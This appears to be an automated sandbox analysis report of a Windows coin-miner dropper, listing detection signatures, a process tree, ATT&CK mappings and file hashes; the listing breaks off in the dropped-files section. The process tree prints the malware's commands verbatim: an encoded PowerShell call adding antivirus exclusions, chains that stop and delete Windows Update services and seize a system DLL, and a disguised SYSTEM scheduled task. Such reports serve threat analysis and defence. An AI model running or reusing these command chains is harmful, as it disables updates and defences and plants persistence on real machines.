Analysis

  • max time kernel
    301s
  • max time network
    300s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    02-07-2022 22:15

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 13 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 46 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1000
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1272
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1768
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1300
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:1668
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1088
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:336
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1456
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:1600
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:1436
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:1896
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies registry key
            PID:588
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1692
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:544
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:1784
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1492
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:588
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1680
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1396
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:608
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:948
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:1604
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:1784
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:1284
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:1480
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:788
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:1728
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                          PID:336
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-ac 0
                            5⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1736
                          • C:\Windows\system32\powercfg.exe
                            powercfg /x -hibernate-timeout-dc 0
                            5⤵
                              PID:108
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-ac 0
                              5⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1968
                            • C:\Windows\system32\powercfg.exe
                              powercfg /x -standby-timeout-dc 0
                              5⤵
                              • Modifies security service
                              • Suspicious use of AdjustPrivilegeToken
                              PID:588
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                            4⤵
                              PID:968
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                5⤵
                                • Creates scheduled task(s)
                                • Suspicious use of AdjustPrivilegeToken
                                PID:108
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              4⤵
                                PID:1456
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /run /tn "GoogleUpdateTaskMachineQC"
                                  5⤵
                                    PID:1088
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\Windows\Temp\run.bat" "
                              2⤵
                              • Drops startup file
                              PID:1692
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c ""C:\Windows\Temp\lol.bat" "
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:468
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" https://take-realprize.life/?u=lq1pd08&o=hdck0gl
                                3⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SetWindowsHookEx
                                • Suspicious use of WriteProcessMemory
                                PID:1224
                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1224 CREDAT:275457 /prefetch:2
                                  4⤵
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2036
                          • C:\Windows\system32\conhost.exe
                            \??\C:\Windows\system32\conhost.exe "12104933518278737305711001-1425121908373838971704690620-2003029459996178626"
                            1⤵
                              PID:1456
                            • C:\Windows\system32\taskeng.exe
                              taskeng.exe {BA4A62BF-10FE-46A2-AF89-406FCF005CB9} S-1-5-18:NT AUTHORITY\System:Service:
                              1⤵
                              • Loads dropped DLL
                              PID:1608
                              • C:\Program Files\Chrome\updater.exe
                                "C:\Program Files\Chrome\updater.exe"
                                2⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:1968
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                                  3⤵
                                  • Drops file in Drivers directory
                                  • Suspicious use of SetThreadContext
                                  • Drops file in Program Files directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1492
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                    4⤵
                                      PID:1112
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                        5⤵
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1108
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                      4⤵
                                        PID:1896
                                        • C:\Windows\system32\sc.exe
                                          sc stop UsoSvc
                                          5⤵
                                          • Launches sc.exe
                                          PID:1524
                                        • C:\Windows\system32\sc.exe
                                          sc stop WaaSMedicSvc
                                          5⤵
                                          • Launches sc.exe
                                          PID:1272
                                        • C:\Windows\system32\sc.exe
                                          sc stop wuauserv
                                          5⤵
                                          • Launches sc.exe
                                          PID:672
                                        • C:\Windows\system32\sc.exe
                                          sc stop bits
                                          5⤵
                                          • Launches sc.exe
                                          PID:1516
                                        • C:\Windows\system32\sc.exe
                                          sc stop dosvc
                                          5⤵
                                          • Launches sc.exe
                                          PID:1396
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                          5⤵
                                          • Modifies registry key
                                          PID:940
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                          5⤵
                                          • Modifies registry key
                                          PID:1692
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                          5⤵
                                          • Modifies registry key
                                          PID:1580
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                          5⤵
                                          • Modifies registry key
                                          PID:336
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                          5⤵
                                          • Modifies registry key
                                          PID:788
                                        • C:\Windows\system32\takeown.exe
                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                          5⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1396
                                        • C:\Windows\system32\icacls.exe
                                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                          5⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:576
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                          5⤵
                                          • Modifies registry key
                                          PID:1108
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                          5⤵
                                          • Modifies registry key
                                          PID:1140
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                          5⤵
                                          • Modifies registry key
                                          PID:960
                                        • C:\Windows\system32\reg.exe
                                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                          5⤵
                                          • Modifies registry key
                                          PID:608
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                          5⤵
                                            PID:1768
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                            5⤵
                                              PID:1692
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                              5⤵
                                                PID:1580
                                              • C:\Windows\system32\schtasks.exe
                                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                                5⤵
                                                  PID:336
                                                • C:\Windows\system32\schtasks.exe
                                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                                  5⤵
                                                    PID:788
                                                  • C:\Windows\system32\schtasks.exe
                                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                                    5⤵
                                                      PID:948
                                                    • C:\Windows\system32\schtasks.exe
                                                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                                      5⤵
                                                        PID:896
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                      4⤵
                                                        PID:1728
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -hibernate-timeout-ac 0
                                                          5⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:940
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -hibernate-timeout-dc 0
                                                          5⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1692
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -standby-timeout-ac 0
                                                          5⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1256
                                                        • C:\Windows\system32\powercfg.exe
                                                          powercfg /x -standby-timeout-dc 0
                                                          5⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:872
                                                      • C:\Windows\System32\conhost.exe
                                                        C:\Windows\System32\conhost.exe
                                                        4⤵
                                                          PID:588
                                                          • C:\Windows\System32\conhost.exe
                                                            "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                            5⤵
                                                              PID:1272
                                                          • C:\Windows\explorer.exe
                                                            C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                            4⤵
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1108

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Execution

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Persistence

                                                    Modify Existing Service

                                                    2
                                                    T1031

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Privilege Escalation

                                                    Scheduled Task

                                                    1
                                                    T1053

                                                    Defense Evasion

                                                    Modify Registry

                                                    3
                                                    T1112

                                                    Virtualization/Sandbox Evasion

                                                    1
                                                    T1497

                                                    Impair Defenses

                                                    1
                                                    T1562

                                                    File Permissions Modification

                                                    1
                                                    T1222

                                                    Discovery

                                                    Query Registry

                                                    2
                                                    T1012

                                                    Virtualization/Sandbox Evasion

                                                    1
                                                    T1497

                                                    System Information Discovery

                                                    3
                                                    T1082

                                                    Impact

                                                    Service Stop

                                                    1
                                                    T1489

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Program Files\Chrome\updater.exe
                                                      Filesize

                                                      7.3MB

                                                      MD5

                                                      0c9bed327840bbe964e85913d5868fcb

                                                      SHA1

                                                      ef0b874b57be491ae87ed0237a025d5580265218

                                                      SHA256

                                                      3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                      SHA512

                                                      12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                      Filesize

                                                      60KB

                                                      MD5

                                                      589c442fc7a0c70dca927115a700d41e

                                                      SHA1

                                                      66a07dace3afbfd1aa07a47e6875beab62c4bb31

                                                      SHA256

                                                      2e5cb72e9eb43baafb6c6bfcc573aac92f49a8064c483f9d378a9e8e781a526a

                                                      SHA512

                                                      1b5fa79e52be495c42cf49618441fb7012e28c02e7a08a91da9213db3ab810f0e83485bc1dd5f625a47d0ba7cfcdd5ea50acc9a8dcebb39f048c40f01e94155b

                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                      Filesize

                                                      304B

                                                      MD5

                                                      6d883456122fe65282df919330ef7988

                                                      SHA1

                                                      024a3fb9453b46d084dd2373f5d5ea38247808c8

                                                      SHA256

                                                      414535dd0abc00ebf9f1f388dbefd89b747c5c36e26deab52d5c15f140cd6a59

                                                      SHA512

                                                      29c881a398b7d4d5bb79093aa52c6b6c27b56d8d70069e70d63cfd5ab74ecfb548a200627bb88811c6da5d7244b4e441b8735199bc360df3060604a7871b2832

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IM5ZDZKW.txt
                                                      Filesize

                                                      599B

                                                      MD5

                                                      07151a4bf1b4b62d6c57452660d68186

                                                      SHA1

                                                      dff92e394ff1fd1df480ee73fbe0070eb4229946

                                                      SHA256

                                                      12e465db118cd987001f834cf7d812ec28a9c8b7c6d858661022b8c0551fee60

                                                      SHA512

                                                      62d99b3d268327834ad174a1855ec3a4804cd54e9c73923b385399c86eb7c3fdcc11eb181eebeb560562936bb04e226b40e126f4b0744104efceb50d5011073c

                                                    • C:\Windows\Temp\lol.bat
                                                      Filesize

                                                      59B

                                                      MD5

                                                      f580e0e80cc87b25e38ea2c0c8059d04

                                                      SHA1

                                                      299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                      SHA256

                                                      9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                      SHA512

                                                      5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                                    • C:\Windows\Temp\run.bat
                                                      Filesize

                                                      98B

                                                      MD5

                                                      731afe244b2414169a5f630d52646e56

                                                      SHA1

                                                      e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                      SHA256

                                                      6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                      SHA512

                                                      84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

                                                    • C:\Windows\Temp\setup.exe
                                                      Filesize

                                                      7.3MB

                                                      MD5

                                                      0c9bed327840bbe964e85913d5868fcb

                                                      SHA1

                                                      ef0b874b57be491ae87ed0237a025d5580265218

                                                      SHA256

                                                      3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                      SHA512

